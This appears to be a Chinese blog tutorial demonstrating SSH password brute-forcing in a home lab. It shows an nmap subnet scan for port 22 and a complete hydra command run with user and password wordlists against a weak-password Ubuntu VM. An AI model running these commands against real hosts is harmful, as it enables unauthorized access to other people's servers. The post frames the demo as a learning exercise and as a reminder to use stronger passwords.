诺诺博客

  • 概述:
  • 实例演示:
  • 总结:
  •  主 页
  •  Linux
  •  微 软
  •  信 创
  •  虚 拟
  •  网 络
  •  生 活
  •  归 档
  •  友 链
  •  关 于

SSH爆破实例演示(仅供学习)

  • 诺诺
  • 2024-09-12
  • 0

概述:

利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台都可运行SSH。

使用SSH进行服务器远程管理,仅仅需要知道服务器的IP地址、端口、管理账号和密码,即可进行服务器的管理,网络安全遵循木桶原理,只要通过SSH撕开一个口子,对渗透人员来时这将是一个新的世界。

本文对目前流行的SSH密码暴力破解工具进行实战研究、分析和总结,对渗透攻击测试和安全防御具有一定的参考价值,同时也是为了强调大家加强自己服务器密码强度。

环境说明:

靶机是一台Ubuntu虚拟机,全新安装的操作系统,root用户设置弱口令,未做其他优化处理。

SSH爆破实例演示(仅供学习)-诺诺博客

爆破源是一台Kali Linux虚拟机

SSH爆破实例演示(仅供学习)-诺诺博客

实例演示:

先使用 nmap 扫描局域网中查看是否有开放22端口的存活主机并输出列表。

nmap -p 22 192.168.118.0/24 > /root/Desktop/list.txt
SSH爆破实例演示(仅供学习)-诺诺博客

目标有了,现在开始使爆破靶机。

准备用户、密码的字典,爆破目标IP地址(能否爆破成功,取决于字典的数据量!)这里只是为了演示。

用户字典

SSH爆破实例演示(仅供学习)-诺诺博客

密码字典

SSH爆破实例演示(仅供学习)-诺诺博客

爆破目标

SSH爆破实例演示(仅供学习)-诺诺博客
hydra -L /root/Desktop/zidian/user.txt -P /root/Desktop/zidian/password.txt -e nsr -M /root/Desktop/ip.txt -t 10 -vV ssh 
SSH爆破实例演示(仅供学习)-诺诺博客

爆破执行中,发现已经成功爆破一台主机

SSH爆破实例演示(仅供学习)-诺诺博客

验证

SSH爆破实例演示(仅供学习)-诺诺博客

总结:

通过本文希望大家今后在设置服务器相关密码的时候应当加强密码的强度,提高安全。

© 2025 诺诺博客 蜀ICP备2024099071号-1 如有侵权请联系删除 | 网站地图 | 百度统计 | 又拍云CDN加速
为了获得更好的浏览效果 建议您使用IE8.0及以上版本浏览器登陆本站点 · 服务器托管于腾讯云
  • {{ item.name }}
  • {{ item.name }}